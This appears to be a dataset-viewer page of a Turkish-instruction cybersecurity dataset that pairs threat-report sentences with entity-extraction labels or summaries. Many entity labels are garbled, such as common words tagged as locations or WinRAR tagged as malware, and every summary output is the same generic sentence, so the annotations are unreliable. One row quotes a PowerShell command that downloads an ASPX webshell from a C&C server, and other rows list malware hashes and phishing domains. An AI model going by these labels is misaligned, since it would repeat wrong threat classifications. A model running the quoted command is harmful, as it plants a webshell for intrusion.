instruction
stringclasses 2
values | input
stringlengths 3
5.01k
| output
stringlengths 10
5.79k
|
|---|---|---|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Simply explained: Figure 1 Conversation Hijacking to Deliver Malware Unit 42 observed this specific attack taking advantage of a vulnerability in Microsoft Office, which has a patch available.
|
identity: Microsoft
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This key is also sent via a HTTP POST request.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Encrypted backdoor configuration
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
If clientID equals the following sequence of bytes B4 B1 47 BC 52 28 28 73 1F 1A 01 6B FA 72 C0 73, then the scrambled version is computed using the third parameter (0x10), which is treated as a DWORD.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This particular webshell is based on AntSword’s shell.jsp, which was modified to use a parameter of k3rwin instead of ant to load the class.
|
tools: AntSword; identity: k3rwin; FILEPATH: shell.jsp
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
During this part, the core component initializes the modules.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
How You Can Prevent Unauthorized Coin Mining Attacks If you’re a shopper, there are three things you can do to protect yourself against unauthorized coin mining attacks this holiday season: If you’re a retailer, preventing unauthorized coin mining attacks comes down to focusing on two tasks, both of which you should be doing anyway: Finally, if you’re a legitimate website that has chosen to implement coin mining to raise funds from your visitors, you can ensure that your visitors don’t think you’re engaged in unauthorized coin mining by doing three things: Conclusion Working to prevent cybercrime threats during the holiday season has become a standard part of what shoppers and retailers do every year.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store.
|
TIME: May 2020; threat-actor: APT35; SOFTWARE: Google Play Store
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Upon receiving the malicious document, the user is advised to enable macros.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
An overview and analysis of the various malware used by PLEAD, Shrouded Crossbow, and Waterbear, along with their Indicators of Compromise (hashes, C&Cs), can be found in this technical brief. Tags Articles, News, Reports | APT & Targeted Attacks | Research
|
location: and; malware: PLEAD; location: and; location: along; location: can; location: APT
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
So far in 2021, we’ve sent over 50,000 warnings, a nearly 33% increase from this time in 2020.
|
TIME: 2021; TIME: 2020
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The campaign is ongoing, with the threat actor switching to new infrastructures when used domain names get reported or blacklisted in systems.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
After downloading the payload, it removes the quarantine attribute of the file to bypass Gatekeeper.
|
tools: Gatekeeper
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Updated on November 27, 2019 at 11:00 PM PST to add new information about a C&C domain.
|
TIME: 11:00 PM PST
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We also saw WinRAR self-extracting (SFX) files dropping downloaders written using the Microsoft Foundation Class Library (MFC) framework.
|
malware: WinRAR; identity: Microsoft; location: Library
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
May 2021:
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
If the user clicks on the “No” button, malicious activity will not initiate.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The top three samples we observed spreading in early 2021 were Ryuk, Maze, and Sodinokibi.
|
malware: Ryuk; malware: Sodinokibi; malware: Maze; TIME: 2021
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Additionally, the LockBit 2.0 RaaS leak site has the most significant number of published victims, with over 850 in total.
|
threat-actor: LockBit 2.0
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
For the same purpose, on Linux systems, Carbanak attacks can use sudo, a program that permits users to execute the programs of a superuser.
|
threat-actor: Carbanak
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Additionally, this attack technique is not exclusive to the Sofacy Group.
|
threat-actor: Sofacy Group
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Winnti currently uses different encryption algorithms to store those C&C references in the files they stored on Github.
|
identity: Winnti ; SOFTWARE: Github
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Strings contained in the binary are decrypted via a simple binary XOR against a single byte key of 0x25.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This highlights how the cybercrime underground in the Middle East/North African region (covered in our paper titled Digital Souks: A Glimpse into the Middle Eastern and North African Underground) can expand their activity into areas beyond their original area of expertise.
|
location: region; location: can; malware: expand
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Better together Trend Micro and AWS have been working closely together for over a decade now, and this latest announcement represents another exciting stage in the journey.
|
identity: Trend Micro; identity: AWS
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
DarkHydrus has used custom tools in addition to publicly available red-teaming tools such as Phishery.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Among other targets, this spyware was used to compromise journalists and opposition politicians.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Ireland has yet to recover from an attack in mid-May that prompted the shutdown of the entire information technology network of the nation's healthcare system – prompting cancellation of appointments, the shutdown of X-ray systems and delays in COVID testing.
|
location: Ireland; TIME: mid-May
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
File System Traversal 0x500C
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In light of this latest research, the risk of overlay attacks takes on a greater significance.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Certificate Thumbprint Valid From Valid To EFB70718BC00393A01694F255A28E30E9D2142A4 12:00 a.m., Jan. 2, 2019 11:59 p.m., Mar. 2, 2021 8CE020AA874902C532B9911A4DCA8EFFA627DC80 12:00 a.m., Sept. 6, 2018 11:59 p.m., Oct. 5, 2021 Table 3.
|
TIME: 12:00 a.m., Jan. 2, 2019; TIME: 11:59 p.m., Mar. 2, 2021; TIME: 11:59 p.m., Oct. 5, 2021; TIME: 12:00 a.m., Sept. 6, 2018
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Here is a translation of the relevant section: “Well, in the end, I modified the project configuration file as below, but it doesn't seem like best practice.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The strongest evidence that this attack might not come from TA505 is that this attack operator used a different spam infrastructure.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This practice is not necessarily dangerous, as long as the developer does not share the key with the various banks that contracted the applications.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
AsyncRAT – an open-source RAT that can be used to remotely monitor and control devices via an encrypted connection Trochilus – a stealthy RAT that can evade sandbox analysis and can be used in cyberespionage campaigns Security recommendations
|
malware: AsyncRAT; attack-pattern: source; location: can; location: monitor; location: and; malware: Trochilus; location: can; location: and; location: can; location: Security
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This appendix contains the latest indicators of compromise (IOCs) related to the different groups.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Related hashes are listed in the Technical Details section, at the end of this report.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This group generally used spear-phishing with macro-enabled Office documents to deliver their payloads, which were either embedded directly in the macro, or hosted on a first stage C2 server.
|
location: spear; attack-pattern: phishing
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Overview of Earth Centaur’s infection chain
|
threat-actor: Earth Centaur
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
An “overlay attack” is an attack where an attacker’s app draws a window over (or “overlays”) other windows and apps running on the device.
|
attack-pattern: overlay attack
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
  [Lightly edited transcript of the video above] Hi there, Mark Nunnikhoven from Trend Micro Research, I want to talk to you about the concept of lateral movement.
|
attack-pattern: lateral movement; identity: Mark Nunnikhoven; identity: Trend Micro Research
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
They use a one-time generated series of numbers for each transaction, so that if attackers get their hands on it, they won’t be able to use it in the future.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The app’s APK is linked directly from the homepage, with a disclaimer stating that Google Play does not allow pornography in their store.
|
SOFTWARE: Google Play
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We also identified multiple Android APK files on their server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
However, we did not have access to the a.ps1 file.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
It contains the core, beans, context and Spring Expression Language (SpEL) modules.
|
SOFTWARE: Spring Expression Language (SpEL)
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan
|
SHA2: afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045; SHA2: 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114; SHA2: de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11; SHA2: 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3; SHA2: 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d; FILEPATH: aos.exe; malware: BIOPASS RAT binary (Nuitka); FILEPATH: fn.exe; malware: BIOPASS RAT binary (Nuitka); malware: BIOPASS RAT binary (Nuitka); malware: Trojan.Win32.BIOPASS.A; FILEPATH: socketio.exe; malware: Trojan.Win32.BIOPASS.A; FILEPATH: socketio.exe; malware: Trojan.Win32.BIOPASS.A; FILEPATH: flash_ins_bak.exe; FILEPATH: files.zip; malware: Trojan.Win32.BIOPASS.A; malware: BIOPASS RAT binary (PyInstaller); malware: Trojan.Win32.BIOPASS.A; malware: BIOPASS RAT binary (Nuitka); malware: BIOPASS RAT binary (Nuitka) Trojan
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
While the older campaign uses a different shellcode loader, which we have named LavagokLdr, we have observed similar code and procedures between LavagokLdr and StealthVector.
|
malware: LavagokLdr; malware: LavagokLdr; malware: StealthVector
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Each of these applications is designed to appear like a legitimate application already in the app store.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Patching of internal systems that might support lateral movement and privilege escalation should be prioritized, as well as against known public exploits that these actors might employ.
|
attack-pattern: privilege escalation
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We also recommend users of the Chrome browser to update to version 79.0.3945.130 as they recently released an update to fix the TLS issue. Palo Alto Networks customers running Traps are now safeguarded from the Windows CryptoAPI Spoofing vulnerability, regardless of whether they are running an unpatched Microsoft Windows 10 system.
|
SOFTWARE: Microsoft Windows 10 ; SOFTWARE: Windows CryptoAPI; SOFTWARE: Chrome; identity: Palo Alto Networks
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
2. The “set key” handler is used for accepting the victim ID, a random string with six characters, assigned by the C&C server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Table 1.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We previously highlighted the dangers of installing apps that enable IAPs using SMS messages, as these apps typically have access to all SMS messages sent to the phone.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In what way?
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe /c powershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide >.
|
SOFTWARE: ASPX; Infrastucture: C&C server; URL: hxxp://xx.xx.xx.xx/subshell.aspx; tools: PowerShell; FILEPATH: /ManageEngine/ADSelfService Plus/webapps/adssp/help/admin-guide; tools: powershell; tools: cmd.exe
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The first step is to understand the scope of the problem.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In fact, Trend Micro is only the second cybersecurity specialist to join.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The user needs to know the IP of the infected client, the port used by malware and the encryption password to properly decode the traffic.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Users can also turn on mail inspection for sender “sendgrid[.]net” in the email gateway.
|
URL: “sendgrid[.]net”
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Palo Alto Networks is still actively investigating a number of the aforementioned vulnerabilities, many of which do not have publicly available exploit code.
|
identity: Palo Alto Networks
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Here’s a more technical example.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Cookie Theft, also known as “pass-the-cookie attack,” is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.
|
attack-pattern: Cookie Theft; attack-pattern: pass-the-cookie attack; attack-pattern: session hijacking
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
It has been five days since the shutdown prompted by the attack, but Colonial Pipeline is still unable to resume full operations.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Jon Clay, VP of Threat Intelligence: [00:00:00
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Encoded “join” event sent to the C&C server Figure 19.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The receiver starts the malicious service.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Thankfully Kaseya acted extremely quickly advising all Kaseya VSA on-premises users to shut down their servers until further instructions.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
He was probably either using the Windows version of Secret Chat Point or its web interface, which explains why hayat22 was urging him to install Android Tweety Chat.
|
SOFTWARE: Android Tweety Chat; SOFTWARE: Windows; SOFTWARE: Secret Chat Point; identity: hayat22
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Analysis of Kinsing Malware's Use of Rootkit
|
malware: Kinsing Malware's; attack-pattern: Rootkit
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Aside from this, changing the encryption mechanism or packer would result in a totally different BLOB.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 14 (below) shows a raw comparison across many samples using two time zones.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.
|
tools: safety; location: and; location: security
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
LockBit’s continuation with operations and its next iteration coming up on the horizon means that organizations and their security teams need to stay vigilant in the ever-evolving threat landscape.
|
threat-actor: LockBit
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Pulling together deep security information from across your enterprise is what is needed to face off against such advanced and intentionally evasive attacks.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Based on Trend Micro data, the US is by far DarkSide’s most targeted country, at more than 500 detections, followed by France, Belgium, and Canada.
|
malware: DarkSide’s ; location: Belgium; location: France; location: US ; location: Canada
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
For example, we detected two domains distributing the same malicious binary where one domain was impersonating a popular, widely used video conferencing application and the other a widely used internet browser.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
During our research we observed multiple variants impacting Windows and Linux systems.
|
SOFTWARE: Windows; SOFTWARE: Linux
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In most cases, this means no authentication is required to exploit the vulnerability.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
It is also clear that the actual interest is on the “.hwp” extension for Korean Office document listing support during exfiltration.
|
SOFTWARE: Office
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We were able to see this threat actor demonstrating some of his tools performing automated actions in his videos, such as obfuscating files, creating executables and code signing (Figure 21).
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
We terminated 4 YouTube channels as part of our actions against a coordinated influence operation.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The value in the command byte determines which of the commands is run through a 76 way switch statement.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
For the C&C connections, the customized Lilith RAT will first check in to the attacker’s Dropbox and see if the victim host exists.
|
SOFTWARE: Dropbox; malware: Lilith RAT
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
It appears hacking group Outlaw, which has been silent for the past few months, was simply developing their toolkit for illicit income sources.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
pemra[.]email ispr[.]email fbr[.]news defencepk[.]email pakistanarmy[.]email pmogovpk[.]email mailerservice[.]directory file-dnld[.]com funtifu[.]live cnic-update[.]com cnic-ferify[.]live fbr-update[.]com download.fbr[.]tax support-team[.]tech api.priveetalk[.]com Sender email addresses latest_info@fbr.news notice@fbr.news alert@fbr.news thenewsinernational@mailerservice.directory
|
EMAIL: latest_info@fbr.news; EMAIL: notice@fbr.news; EMAIL: alert@fbr.news; EMAIL: thenewsinernational@mailerservice.directory; DOMAIN: file-dnld[.]com; DOMAIN: funtifu[.]live; DOMAIN: fbr[.]news; DOMAIN: defencepk[.]email; DOMAIN: pakistanarmy[.]email; DOMAIN: pmogovpk[.]email; DOMAIN: pemra[.]email; DOMAIN: ispr[.]email; DOMAIN: mailerservice[.]directory; DOMAIN: download.fbr[.]tax; DOMAIN: support-team[.]tech; DOMAIN: cnic-update[.]com; DOMAIN: cnic-ferify[.]live; DOMAIN: fbr-update[.]com; DOMAIN: api.priveetalk[.]com
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
All data sent via HTTP POST requests is sent in the clear.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
(See my recent webinar on trends in ransomware.)
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Several adversarial techniques were observed in this activity and the following measures are suggested within Palo Alto Networks products and services to ensure mitigation of threats related to LockBit 2.0 ransomware, as well as other malware using similar techniques: Exploit Public-Facing Application [T1190], Command and Scripting Interpreter [T1059], Local Account [T1136.001], Web Shell [T1505.003], Exploitation for Privilege Escalation [T1068], Indicator Removal on Host [T1070], Deobfuscate/Decode Files or Information [T1140], Disable or Modify Tools [T1562.001], Hidden Window [T1564.003], Valid Accounts [T1078], External Remote Services [T1133], Scheduled Task [T1053.005], Bypass User Account Control [T1548.002], Group Policy Modification [T1484.001] OS Credential Dumping [T1003], Credentials from Password Stores [T1555] Network Service Scanning [T1046], Process Discovery [T1057], System Location Discovery [T1614], System Information Discovery [T1082] Remote Services [T1021], SMB/Windows Admin Shares [T1021.002] Remote Access Software [T1219] Data Transfer Size Limits [T1030], Exfiltration Over C2 Channel [T1041] Data Encrypted for Impact [T1486], Service Stop [T1489] †These capabilities are part of the NGFW security subscriptions service
|
identity: Palo Alto Networks; threat-actor: LockBit 2.0; attack-pattern: Exploit Public-Facing Application [T1190]; attack-pattern: Local Account [T1136.001]; attack-pattern: Group Policy Modification [T1484.001]; attack-pattern: Credentials from Password Stores [T1555]; attack-pattern: Process Discovery [T1057]; attack-pattern: System Information Discovery [T1082]; attack-pattern: Remote Services [T1021]; attack-pattern: Exfiltration Over C2 Channel [T1041]; attack-pattern: Data Encrypted for Impact [T1486]; attack-pattern: System Location Discovery [T1614]; attack-pattern: Remote Access Software [T1219]; attack-pattern: Service Stop [T1489]; attack-pattern: Command and Scripting Interpreter [T1059]; attack-pattern: Exploitation for Privilege Escalation [T1068]; attack-pattern: Indicator Removal on Host [T1070]; attack-pattern: Disable or Modify Tools [T1562.001]; attack-pattern: Hidden Window [T1564.003]; attack-pattern: Valid Accounts [T1078]; attack-pattern: External Remote Services [T1133]; attack-pattern: Scheduled Task [T1053.005]; attack-pattern: Bypass User Account Control [T1548.002]; attack-pattern: Network Service Scanning [T1046]; attack-pattern: SMB/Windows Admin Shares [T1021.002]; attack-pattern: Data Transfer Size Limits [T1030]; attack-pattern: Web Shell [T1505.003]; attack-pattern: Deobfuscate/Decode Files or Information [T1140]; attack-pattern: OS Credential Dumping [T1003]
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Eventually, the threat actor added improvements to the malware, like encryption.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The randomly chosen executable must not contain any of the following strings: This dropped malware begins by performing the same parent process check witnessed in the original sample.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Why IIoT matters Industrial IoT (IIoT) systems are already streamlining production processes, improving cost efficiencies, and helping to drive greater agility and innovation for manufacturers.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Additionally, you should practice good cybersecurity hygiene.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.